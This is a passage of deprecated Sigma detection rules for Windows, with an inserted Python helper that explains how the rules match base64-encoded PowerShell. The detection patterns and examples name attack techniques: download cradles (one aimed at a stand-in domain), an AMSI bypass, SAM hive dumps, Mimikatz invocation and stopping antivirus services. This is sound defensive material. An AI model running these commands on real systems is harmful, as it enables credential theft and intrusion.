    "content": "title: Execute MSDT.EXE Using Diagcab File\nid: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3\nstatus: deprecated\ndescription: Detects diagcab leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in CVE-2022-30190\nreferences:\n    - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0\n    - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd\nauthor: GossiTheDog, frack113\ndate: 2022/06/09\nmodified: 2023/02/06\ntags:\n    - attack.defense_evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\msdt.exe'\n        - OriginalFileName: 'msdt.exe'\n    selection_cmd:\n        CommandLine|contains:\n            - ' /cab'\n            - ' -cab'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of \".diagcab\" files\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_new_service_creation.yml",
    "content": "title: New Service Creation\nid: 7fe71fc9-de3b-432a-8d57-8c809efc10ab\nstatus: deprecated\ndescription: Detects creation of a new service.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md\nauthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/21\nmodified: 2023/02/20\ntags:\n    - attack.persistence\n    - attack.privilege_escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc:\n        Image|endswith: '\\sc.exe'\n        CommandLine|contains|all:\n            - 'create'\n            - 'binPath'\n    selection_posh:\n        CommandLine|contains|all:\n            - 'New-Service'\n            - '-BinaryPathName'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administrator or user creates a service for legitimate reasons.\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_nslookup_pwsh_download_cradle.yml",
    "content": "title: Nslookup PwSh Download Cradle\nid: 72671447-4352-4413-bb91-b85569687135\nstatus: deprecated\ndescription: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]\nreferences:\n    - https://twitter.com/alh4zr3d/status/1566489367232651264\nauthor: Zach Mathis (@yamatosecurity)\ndate: 2022/09/06\nmodified: 2022/12/14 # Deprecation date\ntags:\n    - attack.command_and_control\n    - attack.t1105\n    - attack.t1071.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\powershell.exe'\n        Image|contains: nslookup\n        CommandLine|contains: '=txt '\n    condition: selection\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_odbcconf_susp_exec.yml",
    "content": "title: Application Whitelisting Bypass via DLL Loaded by odbcconf.exe\nid: 65d2be45-8600-4042-b4c0-577a1ff8a60e\nstatus: deprecated\ndescription: Detects a defense evasion attempt in which odbcconf.exe is executed to load a DLL\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://twitter.com/Hexacorn/status/1187143326673330176\n    - https://redcanary.com/blog/raspberry-robin/\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca\nauthor: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/25\nmodified: 2023/05/22\ntags:\n    - attack.defense_evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_1_cli:\n        CommandLine|contains:\n            - '-a'\n            - '-f'\n            - '/a'\n            - '/f'\n            - 'regsvr'\n    selection_2_parent:\n        ParentImage|endswith: '\\odbcconf.exe'\n    selection_2_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    condition: all of selection_1_* or all of selection_2_*\nfalsepositives:\n    - Legitimate use of odbcconf.exe by legitimate user\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml",
    "content": "title: Excel Proxy Executing Regsvr32 With Payload\nid: 9d1c72f5-43f0-4da5-9320-648cf2099dd0\nstatus: deprecated\ndescription: |\n  Excel called wmic, which in turn proxy-executed regsvr32 with the payload.\n  The attacker used this extra hop to break the suspicious parent-child chain (Office app spawns LOLBin).\n  The command line recorded in the event still lets us \"restore\" that parent-child chain and detect it.\n  Monitor process creation events with \"wmic process call create\" and a LOLBin in the command line whose parent is an Office application process.\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)'\ndate: 2021/08/23\nmodified: 2022/12/02\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense_evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    #useful_information: add more LOLBins to the rules logic of your choice.\n    selection_img:\n        - Image|endswith: '\\wbem\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_other:\n        CommandLine|contains:\n            - 'regsvr32'\n            - 'rundll32'\n            - 'msiexec'\n            - 'mshta'\n            - 'verclsid'\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n        CommandLine|contains|all:\n            - 'process'\n            - 'create'\n            - 'call'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml",
    "content": "title: Excel Proxy Executing Regsvr32 With Payload Alternate\nid: c0e1c3d5-4381-4f18-8145-2583f06a1fe5\nstatus: deprecated\ndescription: |\n  Excel called wmic, which in turn proxy-executed regsvr32 with the payload.\n  The attacker used this extra hop to break the suspicious parent-child chain (Office app spawns LOLBin).\n  The command line recorded in the event still lets us \"restore\" that parent-child chain and detect it.\n  Monitor process creation events with \"wmic process call create\" and a LOLBin in the command line whose parent is an Office application process.\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)'\ndate: 2021/08/23\nmodified: 2022/12/02\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense_evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    #useful_information: add more LOLBins to the rules logic of your choice.\n    selection1:\n        CommandLine|contains:\n            - 'regsvr32'\n            - 'rundll32'\n            - 'msiexec'\n            - 'mshta'\n            - 'verclsid'\n    selection2:\n        - Image|endswith: '\\wbem\\WMIC.exe'\n        - CommandLine|contains: 'wmic '\n    selection3:\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n    selection4:\n        CommandLine|contains|all:\n            - 'process'\n            - 'create'\n            - 'call'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_office_spawning_wmi_commandline.yml",
    "content": "title: Office Applications Spawning Wmi Cli Alternate\nid: 04f5363a-6bca-42ff-be70-0d28bf629ead\nstatus: deprecated\ndescription: Detects Office applications spawning wmic, as seen when the initial execution of a malicious document calls wmic to run its payload via regsvr32\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)\ndate: 2021/08/23\nmodified: 2023/02/04\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense_evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    #useful_information: Add more office applications to the rule logic of choice\n    selection1:\n        - Image|endswith: '\\wbem\\WMIC.exe'\n        - CommandLine|contains: 'wmic '\n    selection2:\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n            - '\\msaccess.exe'\n            - '\\mspub.exe'\n            - '\\eqnedt32.exe'\n            - '\\visio.exe'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_possible_applocker_bypass.yml",
    "content": "title: Possible Applocker Bypass\nid: 82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719\nstatus: deprecated\ndescription: Detects execution of executables that can be used to bypass Applocker whitelisting\nreferences:\n    - https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt\n    - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1127.001/T1127.001.md\nauthor: juju4\ndate: 2019/01/16\nmodified: 2022/11/03\ntags:\n    - attack.defense_evasion\n    - attack.t1218.004\n    - attack.t1218.009\n    - attack.t1127.001\n    - attack.t1218.005\n    - attack.t1218   # no way to map 1:1, so the technique level is required\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '\\msdt.exe'\n            - '\\installutil.exe'\n            - '\\regsvcs.exe'\n            - '\\regasm.exe'\n            #- '\\regsvr32.exe'  # too many FPs, very noisy\n            - '\\msbuild.exe'\n            - '\\ieexec.exe'\n            #- '\\mshta.exe'\n            #- '\\csc.exe'\n    condition: selection\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\n    - Using installutil to add features for .NET applications (primarily would occur in developer environments)\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml",
    "content": "title: PowerShell AMSI Bypass Pattern\nid: 4f927692-68b5-4267-871b-073c45f4f6fe\nstatus: deprecated\ndescription: Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.\nauthor: '@Kostastsale'\nreferences:\n    - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\ndate: 2022/11/04\nmodified: 2023/02/03\ntags:\n    - attack.defense_evasion\n    - attack.t1562.001\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection1:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\powershell_ise.exe'\n        CommandLine|contains|all:\n            - '[Ref].Assembly.GetType'\n            - 'SetValue($null,$true)'\n            - 'NonPublic,Static'\n    condition: selection1\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml",
    "content": "title: Malicious Base64 Encoded Powershell Invoke Cmdlets\nid: fd6e2919-3936-40c9-99db-0aa922c356f7\nrelated:\n    - id: 6385697e-9f1b-40bd-8817-f4a91f40508e\n      type: similar\nstatus: deprecated\ndescription: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets\nreferences:\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\nauthor: pH-T (Nextron Systems)\ndate: 2022/05/31\nmodified: 2023/01/30\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense_evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # Invoke-BloodHound\n            - 'SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA'\n            - 'kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA'\n            - 'JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA'\n            # Invoke-Mimikatz\n            - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA'\n            - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A'\n            - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg'\n            # Invoke-WMIExec\n            - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA'\n            - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw'\n            - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA'\n    condition: selection\nfields:\n    - CommandLine\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_base64_listing_shadowcopy.yml",
    "content": "title: Base64 Encoded Listing of Shadowcopy\nid: 47688f1b-9f51-4656-b013-3cc49a166a36\nstatus: deprecated\ndescription: Detects base64 encoded listing Win32_Shadowcopy\nreferences:\n    - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar\nauthor: Christian Burkard (Nextron Systems)\ndate: 2022/03/01\nmodified: 2023/01/30\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense_evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Win32_Shadowcopy | ForEach-Object\n        CommandLine|contains:\n            - 'VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQA'\n            - 'cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A'\n            - 'XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdA'\n    condition: selection\nfields:\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
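Added example, not code from the Sigma repository: it shows where the three base64 strings per cmdlet in the two rules above ("Malicious Base64 Encoded Powershell Invoke Cmdlets" and "Base64 Encoded Listing of Shadowcopy") come from. PowerShell's `-EncodedCommand` is base64 of the UTF-16LE script, and the base64 text of a substring depends on its byte offset modulo 3, so a rule needs one variant per alignment, with the leading and trailing characters that mix in neighbouring bytes cut off. The slicing offsets follow the same scheme as Sigma's `base64offset` modifier; the command-line prefix and the scripts are constructed for the example.

```python
import base64

# Per alignment: leading chars that mix in the preceding bytes, trailing chars
# that mix in the following bytes (same cuts as Sigma's base64offset modifier).
_START = (0, 2, 3)
_END = (None, -3, -2)


def utf16le_base64_variants(text):
    """Base64 substrings matching `text` (as UTF-16LE) at byte offsets 0, 1, 2 mod 3."""
    data = text.encode("utf-16le")
    variants = []
    for shift in range(3):
        # Shift the data by `shift` bytes; the dropped chars do not depend on
        # the padding value, so the remainder matches any preceding bytes.
        enc = base64.b64encode(b"\x00" * shift + data).decode("ascii")
        variants.append(enc[_START[shift]:_END[(len(data) + shift) % 3]])
    return variants


def encoded_command(script):
    """Construct a command line shaped like a `powershell -enc` invocation."""
    blob = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    return "powershell.exe -nop -w hidden -enc " + blob


def match_encoded_cmdlet(command_line, cmdlets):
    """Return the first watched cmdlet whose encoded form occurs in the command line, else None."""
    for name in cmdlets:
        if any(v in command_line for v in utf16le_base64_variants(name)):
            return name
    return None


# Cmdlet names from the rule above; the rule lists exactly these three variants each.
WATCHED = ["Invoke-BloodHound", "Invoke-Mimikatz", "Invoke-WMIExec"]

if __name__ == "__main__":
    for v in utf16le_base64_variants("Invoke-Mimikatz"):
        print(v)
    # Constructed scripts: each leading character shifts the cmdlet by two
    # bytes, so 0, 1 and 2 leading spaces exercise all three alignments.
    for n in range(3):
        cmd = encoded_command(" " * n + "Invoke-Mimikatz -DumpCreds")
        print(n, match_encoded_cmdlet(cmd, WATCHED))
    print(match_encoded_cmdlet(encoded_command("Get-Process | Out-Null"), WATCHED))
```

The variant for offset 0 is the full encoding only when the UTF-16LE length is a multiple of three bytes, which is why "Invoke-Mimikatz" (30 bytes) yields a 40-character string while "Invoke-BloodHound" (34 bytes) is trimmed in the rule.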
  {
    "path": "deprecated/windows/proc_creation_win_powershell_base64_shellcode.yml",
    "content": "title: Potential PowerShell Base64 Encoded Shellcode\nid: 2d117e49-e626-4c7c-bd1f-c3c0147774c8\nstatus: deprecated\ndescription: Detects potential powershell Base64 encoded Shellcode\nreferences:\n    - https://twitter.com/cyb3rops/status/1063072865992523776\nauthor: Florian Roth (Nextron Systems)\ndate: 2018/11/17\nmodified: 2023/04/06\ntags:\n    - attack.defense_evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'OiCAAAAYInlM'\n            - 'OiJAAAAYInlM'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_bitsjob.yml",
    "content": "title: Suspicious Bitsadmin Job via PowerShell\nid: f67dbfce-93bc-440d-86ad-a95ae8858c90\nstatus: deprecated\ndescription: Detect download by BITS jobs via PowerShell\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\nauthor: Endgame, JHasenbusch (ported to sigma for oscd.community)\ndate: 2018/10/30\nmodified: 2022/11/21\ntags:\n    - attack.defense_evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains: 'Start-BitsTransfer'\n    condition: selection\nfields:\n    - ComputerName\n    - User\n    - CommandLine\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_download_cradles.yml",
    "content": "title: PowerShell Web Download\nid: 6e897651-f157-4d8f-aaeb-df8151488385\nstatus: deprecated\ndescription: Detects suspicious ways to download files or content using PowerShell\nreferences:\n    - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-24\nmodified: 2025-07-18\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1105\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '.DownloadString('\n            - '.DownloadFile('\n            - 'Invoke-WebRequest '\n            - 'iwr '\n    condition: selection\nfalsepositives:\n    - Scripts or tools that download files\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_service_modification.yml",
    "content": "title: Stop Or Remove Antivirus Service\nid: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b\nstatus: deprecated\ndescription: |\n    Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.\n    Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/\nauthor: frack113\ndate: 2021/07/07\nmodified: 2023/03/04\ntags:\n    - attack.defense_evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_action:\n        CommandLine|contains:\n            - 'Stop-Service '\n            - 'Remove-Service '\n    selection_product:\n        CommandLine|contains:\n            # Feel free to add more service name\n            - ' McAfeeDLPAgentService'\n            - ' Trend Micro Deep Security Manager'\n            - ' TMBMServer'\n            - 'Sophos'\n            - 'Symantec'\n    condition: all of selection*\nfields:\n    - ComputerName\n    - User\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_susp_ps_downloadfile.yml",
    "content": "title: PowerShell DownloadFile\nid: 8f70ac5f-1f6f-4f8e-b454-db19561216c5\nstatus: deprecated # Deprecated in favor of 3b6ab547-8ec2-4991-b9d2-2b06702a48d7\ndescription: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-08-28\nmodified: 2025-10-20\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.command-and-control\n    - attack.t1104\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'powershell'\n            - '.DownloadFile'\n            - 'System.Net.WebClient'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_xor_encoded_command.yml",
    "content": "title: Potential Xor Encoded PowerShell Command\nid: 5b572dcf-254b-425c-a8c5-d9af6bea35a6\nrelated:\n    - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f\n      type: similar\nstatus: deprecated\ndescription: Detects usage of \"xor\" or \"bxor\" in combination with a \"foreach\" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65\nauthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton\ndate: 2022/07/06\nmodified: 2023/01/30\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        - OriginalFileName:\n            - 'PowerShell.exe'\n            - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'ForEach'\n            - 'Xor'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_reg_dump_sam.yml",
    "content": "title: Registry Dump of SAM Creds and Secrets\nid: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e\nrelated:\n    - id: fd877b94-9bb5-4191-bb25-d79cbd93c167\n      type: similar\nstatus: deprecated\ndescription: Detects the SAM, SYSTEM or SECURITY hive being saved out of the registry (e.g. via 'reg save'). Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through the Windows Registry, where the SAM database is stored\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets\nauthor: frack113\ndate: 2022/01/05\nmodified: 2023/02/04\ntags:\n    - attack.credential_access\n    - attack.t1003.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg:\n        CommandLine|contains: ' save '\n    selection_key:\n        CommandLine|contains:\n            - HKLM\\sam\n            - HKLM\\system\n            - HKLM\\security\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_regsvr32_anomalies.yml",
    "content": "title: Regsvr32 Anomaly\nid: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d\nstatus: deprecated\ndescription: Detects various anomalies in relation to regsvr32.exe\nreferences:\n    - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html\n    - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/\nauthor: Florian Roth (Nextron Systems), oscd.community, Tim Shelton\ndate: 2019/01/16\nmodified: 2023/05/26\ntags:\n    - attack.defense_evasion\n    - attack.t1218.010\n    - car.2019-04-002\n    - car.2019-04-003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains: '\\Temp\\'\n    selection2:\n        Image|endswith: '\\regsvr32.exe'\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\powershell_ise.exe'\n    selection3:\n        Image|endswith: '\\regsvr32.exe'\n        ParentImage|endswith: '\\cmd.exe'\n    selection4a:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains|all:\n            - '/i:'\n            - 'http'\n        CommandLine|endswith: 'scrobj.dll'\n    selection4b:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains|all:\n            - '/i:'\n            - 'ftp'\n        CommandLine|endswith: 'scrobj.dll'\n    selection5:\n        Image|endswith:\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n        ParentImage|endswith: '\\regsvr32.exe'\n    selection6:\n        Image|endswith: '\\EXCEL.EXE'\n        CommandLine|contains: '..\\..\\..\\Windows\\System32\\regsvr32.exe '\n    selection7:\n        ParentImage|endswith: '\\mshta.exe'\n        Image|endswith: '\\regsvr32.exe'\n    selection8:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains:\n            - '\\AppData\\Local'\n            - 'C:\\Users\\Public'\n    selection9: # suspicious extensions https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|endswith:\n            - '.jpg'\n            - '.jpeg'\n            - '.png'\n            - '.gif'\n            - '.bin'\n            - '.tmp'\n            - '.temp'\n            - '.txt'\n    filter1:\n        CommandLine|contains:\n            - '\\AppData\\Local\\Microsoft\\Teams'\n            - '\\AppData\\Local\\WebEx\\WebEx64\\Meetings\\atucfobj.dll'\n    filter2:\n        ParentImage: 'C:\\Program Files\\Box\\Box\\FS\\streem.exe'\n        CommandLine|contains: '\\Program Files\\Box\\Box\\Temp\\'\n    filter_legitimate:\n        CommandLine|endswith: '/s C:\\Windows\\System32\\RpcProxy\\RpcProxy.dll'\n    condition: 1 of selection* and not 1 of filter*\nfields:\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "deprecated/windows/proc_creation_win_renamed_paexec.yml",
    "content": "title: Renamed PaExec Execution\nid: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b\nstatus: deprecated\ndescription: Detects execution of renamed paexec via imphash and executable product string\nreferences:\n    - sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc\n    - https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf\nauthor: Jason Lynch\ndate: 2019/04/17\nmodified: 2023/02/14\ntags:\n    - attack.defense_evasion\n    - attack.t1036.003\n    - attack.g0046\n    - car.2013-05-009\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Product|contains: 'PAExec'\n        - Hashes|contains:\n            - IMPHASH=11D40A7B7876288F919AB819CC2D9802\n            - IMPHASH=6444f8a34e99b8f7d9647de66aabe516\n            - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f\n            - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c\n    filter:\n        Image|contains: 'paexec'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_renamed_powershell.yml",
    "content": "title: Renamed PowerShell\nid: d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20\nstatus: deprecated\ndescription: Detects the execution of a renamed PowerShell often used by attackers or malware\nreferences:\n    - https://twitter.com/christophetd/status/1164506034720952320\nauthor: Florian Roth (Nextron Systems), frack113\ndate: 2019/08/22\nmodified: 2023/01/18\ntags:\n    - car.2013-05-009\n    - attack.defense_evasion\n    - attack.t1036.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Description|startswith:\n            - 'Windows PowerShell'\n            - 'pwsh'\n        Company: 'Microsoft Corporation'\n    filter:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_renamed_psexec.yml",
